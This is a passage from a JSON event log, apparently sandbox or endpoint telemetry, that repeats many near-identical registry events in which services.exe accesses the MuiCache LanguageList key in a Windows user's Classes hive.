Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849490000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849640000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": 